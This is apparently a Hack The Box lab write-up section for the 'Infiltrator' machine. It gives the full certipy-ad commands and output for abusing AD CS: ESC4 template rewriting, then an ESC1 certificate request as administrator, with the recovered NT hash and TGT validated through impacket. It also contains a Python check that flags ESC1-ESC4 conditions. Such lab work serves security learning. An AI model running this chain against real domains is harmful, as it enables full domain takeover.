ADCS


The presence of ADCS was initially discovered by enumerating the RPC endpoints. It was then confirmed during manual system enumeration after the initial foothold. One of the automated enumeration scripts, adPEAS, was then able to pick it up and even identified a vulnerable template. The identified template, Infiltrator_Template, has the ENROLLEE_SUPPLIES_SUBJECT attribute set, and the infiltrator_svc$ account has been granted extended permissions (write rights) over it. Given that the infiltrator_svc$ account has been compromised, I will be able to move forward with this.

┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad find -vulnerable -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via RRP: The NETBIOS connection with the remote host timed out.
[!] Failed to get CA configuration for 'infiltrator-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : infiltrator-DC01-CA
    DNS Name                            : dc01.infiltrator.htb
    Certificate Subject                 : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
    Certificate Serial Number           : 724BCC4E21EA6681495514E0FD8A5149
    Certificate Validity Start          : 2023-12-08 01:42:38+00:00
    Certificate Validity End            : 2124-08-04 18:55:57+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : Infiltrator_Template
    Display Name                        : Infiltrator_Template
    Certificate Authorities             : infiltrator-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          PendAllRequests
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Smart Card Logon
                                          Server Authentication
                                          KDC Authentication
                                          Client Authentication
    Requires Manager Approval           : True
    Requires Key Archival               : False
    Authorized Signatures Required      : 1
    Validity Period                     : 99 years
    Renewal Period                      : 650430 hours
    Minimum RSA Key Length              : 2048
    Permissions
      Object Control Permissions
        Owner                           : INFILTRATOR.HTB\Local System
        Full Control Principals         : INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Owner Principals          : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Dacl Principals           : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Property Principals       : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
    [!] Vulnerabilities
      ESC4                              : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissions

certipy-ad indeed picks up the vulnerable template, Infiltrator_Template, and identifies the vulnerability: ESC4.

ESC4


The ESC4 vulnerability in Active Directory Certificate Services (AD CS) allows attackers to abuse misconfigured certificate template permissions to escalate privileges. An attacker with write access to a template can reconfigure it to enable the ENROLLEE_SUPPLIES_SUBJECT attribute and then request certificates for any user, including high-privilege accounts, potentially gaining unauthorized access to sensitive systems. This vulnerability is particularly critical when write permissions on such templates are granted to low-privilege accounts.

In short, ESC4 is when a user has write privileges over a certificate template. This can, for instance, be abused to overwrite the configuration of the certificate template and make it vulnerable to ESC1.

┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad template -template 'Infiltrator_Template' -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[+] Domain retrieved from CCache: INFILTRATOR.HTB
[+] Username retrieved from CCache: infiltrator_svc$
[+] Trying to resolve 'dc01.infiltrator.htb' at '10.129.180.75'
[+] Authenticating to LDAP server
[+] Using Kerberos Cache: ../infiltrator_svc$@dc01.infiltrator.htb.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache: infiltrator_svc$
[+] Getting TGS for 'host/dc01.infiltrator.htb'
[+] Got TGS for 'host/dc01.infiltrator.htb'
[+] Bound to ldaps://10.129.180.75:636 - ssl
[+] Default path: DC=infiltrator,DC=htb
[+] Configuration path: CN=Configuration,DC=infiltrator,DC=htb
[*] Updating certificate template 'Infiltrator_Template'
[+] MODIFY_DELETE:
[+]     pKIExtendedKeyUsage: []
[+]     msPKI-Certificate-Application-Policy: []
[+] MODIFY_REPLACE:
[+]     nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00']
[+]     flags: [b'0']
[+]     pKIDefaultKeySpec: [b'2']
[+]     pKIKeyUsage: [b'\x86\x00']
[+]     pKIMaxIssuingDepth: [b'-1']
[+]     pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15']
[+]     pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff']
[+]     pKIOverlapPeriod: [b'\x00\x80\xa6\n\xff\xde\xff\xff']
[+]     pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0']
[+]     msPKI-RA-Signature: [b'0']
[+]     msPKI-Enrollment-Flag: [b'0']
[*] Successfully updated 'Infiltrator_Template'

The Infiltrator_Template template is now vulnerable to ESC1. As the debug output shows, certipy-ad cleared the EKU list, zeroed msPKI-Enrollment-Flag and msPKI-RA-Signature (so manager approval and the authorized signature are no longer required) and replaced the template's security descriptor.

┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad find -vulnerable -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[*] Got CA configuration for 'infiltrator-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : infiltrator-DC01-CA
    DNS Name                            : dc01.infiltrator.htb
    Certificate Subject                 : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
    Certificate Serial Number           : 724BCC4E21EA6681495514E0FD8A5149
    Certificate Validity Start          : 2023-12-08 01:42:38+00:00
    Certificate Validity End            : 2124-08-04 18:55:57+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INFILTRATOR.HTB\Administrators
      Access Rights
        ManageCertificates              : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        ManageCa                        : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        Enroll                          : INFILTRATOR.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Infiltrator_Template
    Display Name                        : Infiltrator_Template
    Certificate Authorities             : infiltrator-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Object Control Permissions
        Owner                           : INFILTRATOR.HTB\Local System
        Full Control Principals         : INFILTRATOR.HTB\Authenticated Users
        Write Owner Principals          : INFILTRATOR.HTB\Authenticated Users
        Write Dacl Principals           : INFILTRATOR.HTB\Authenticated Users
        Write Property Principals       : INFILTRATOR.HTB\Authenticated Users
    [!] Vulnerabilities
      ESC1                              : 'INFILTRATOR.HTB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
      ESC2                              : 'INFILTRATOR.HTB\\Authenticated Users' can enroll and template can be used for any purpose
      ESC3                              : 'INFILTRATOR.HTB\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
      ESC4                              : 'INFILTRATOR.HTB\\Authenticated Users' has dangerous permissions

Confirmed. Authenticated Users now hold full control over the template and can enroll in it, so it is vulnerable to ESC1 (and, as a side effect of the rewrite, ESC2 and ESC3 as well).
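To make the conditions behind the two certipy-ad find results above explicit, here is an added audit check (not part of the original writeup or of Certipy) that evaluates a template's raw AD attributes against the ESC1-ESC4 rules. The flag bit values are from MS-CRTD; the two sample templates are constructed from the before/after states shown on this page, and the privileged allow-list is an assumption.

```python
# Rule-based ESC1-ESC4 check over a certificate template's raw AD attributes.
# Flag bit values follow MS-CRTD; the sample templates below are constructed
# from the before/after certipy output on this page.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)

ANY_PURPOSE = "2.5.29.37.0"
REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.2.3.4", "1.3.6.1.4.1.311.20.2.2", ANY_PURPOSE}
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Local System", "Administrators"}  # assumed allow-list

def unprivileged(principals):
    """Principals (DOMAIN\\name) that are not on the privileged allow-list."""
    return sorted({p for p in principals if p.split("\\")[-1] not in PRIVILEGED})

def assess_template(tpl):
    """Return {ESCn: [principals]} for every escalation condition the template meets."""
    ekus = set(tpl["pKIExtendedKeyUsage"]) or {ANY_PURPOSE}  # no EKU at all == any purpose
    approval = bool(tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    enrollers = unprivileged(tpl["enroll"] + tpl["full_control"])  # full control implies enroll
    writers = unprivileged(tpl["write"] + tpl["full_control"])
    open_enrollment = bool(enrollers) and not approval and tpl["msPKI-RA-Signature"] == 0
    supplies_subject = bool(tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    findings = {}
    if open_enrollment and supplies_subject and ekus & AUTH_EKUS:
        findings["ESC1"] = enrollers
    if open_enrollment and ANY_PURPOSE in ekus:
        findings["ESC2"] = enrollers
    if open_enrollment and (ANY_PURPOSE in ekus or REQUEST_AGENT in ekus):
        findings["ESC3"] = enrollers
    if writers:
        findings["ESC4"] = writers
    return findings

ADMINS = ["INFILTRATOR.HTB\\Domain Admins", "INFILTRATOR.HTB\\Enterprise Admins", "INFILTRATOR.HTB\\Local System"]
SVC = "INFILTRATOR.HTB\\infiltrator_svc"
AUTH_USERS = "INFILTRATOR.HTB\\Authenticated Users"

BEFORE = {  # as found: approval plus one signature required; only infiltrator_svc has write rights
    "msPKI-Certificate-Name-Flag": 0x1,
    "msPKI-Enrollment-Flag": 0x8 | 0x2 | 0x1,  # PublishToDs | PendAllRequests | IncludeSymmetricAlgorithms
    "msPKI-RA-Signature": 1,
    "pKIExtendedKeyUsage": ["1.3.6.1.4.1.311.20.2.2", "1.3.6.1.5.5.7.3.1", "1.3.6.1.5.2.3.5", "1.3.6.1.5.5.7.3.2"],
    "enroll": [], "full_control": ADMINS, "write": [SVC] + ADMINS,
}
AFTER = {  # after 'certipy-ad template': flags zeroed, EKUs cleared, Authenticated Users full control
    "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": [], "enroll": [], "full_control": [AUTH_USERS], "write": [AUTH_USERS],
}

if __name__ == "__main__":
    for label, tpl in (("before", BEFORE), ("after", AFTER)):
        print(label, assess_template(tpl))
```

The "before" state yields only ESC4 for infiltrator_svc, while the "after" state yields ESC1 through ESC4 for Authenticated Users, matching the two find outputs.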

ESC1


The ESC1 vulnerability in Active Directory Certificate Services (AD CS) allows attackers to exploit misconfigured certificate templates that permit any authenticated user to request certificates and to supply the subject themselves. If such templates allow certificate issuance without sufficient restrictions, attackers can obtain a certificate for an arbitrary account, including a domain administrator, which can then be used for authentication and privilege escalation. This vulnerability is especially dangerous when default settings are left unchanged or improperly configured.

┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=../infiltrator_svc\$@dc01.infiltrator.htb.ccache certipy-ad req -template 'Infiltrator_Template' -ca 'infiltrator-DC01-CA' -upn administrator@infiltrator.htb -target dc01.infiltrator.htb -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[+] Domain retrieved from CCache: INFILTRATOR.HTB
[+] Username retrieved from CCache: infiltrator_svc$
[+] Trying to resolve 'dc01.infiltrator.htb' at '10.129.180.75'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Using Kerberos Cache: ../infiltrator_svc$@dc01.infiltrator.htb.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache: infiltrator_svc$
[+] Getting TGS for 'host/dc01.infiltrator.htb'
[+] Got TGS for 'host/dc01.infiltrator.htb'
[+] Trying to connect to endpoint: ncacn_np:10.129.180.75[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.180.75[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@infiltrator.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Successfully requested a certificate with the administrator user's UPN. The PFX file containing the certificate and private key was saved as administrator.pfx.

Authentication


┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ certipy-ad auth -domain INFILTRATOR -username administrator -pfx administrator.pfx -k -dns-tcp -ns $IP -dc-ip $IP -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Using principal: administrator@infiltrator
[*] Trying to get TGT...
[*] Got TGT
[*] Saved Kirbi file to 'administrator.kirbi'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@infiltrator': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1

Retrieved a TGT and the NT hash for the administrator user.

Validation


┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ impacket-getTGT INFILTRATOR.HTB/administrator@dc01.infiltrator.htb -hashes aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1 -dc-ip $IP 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Saving ticket in administrator@dc01.infiltrator.htb.ccache

Validated: a TGT was generated for the administrator user using the recovered hash. Moving on to the privilege escalation phase.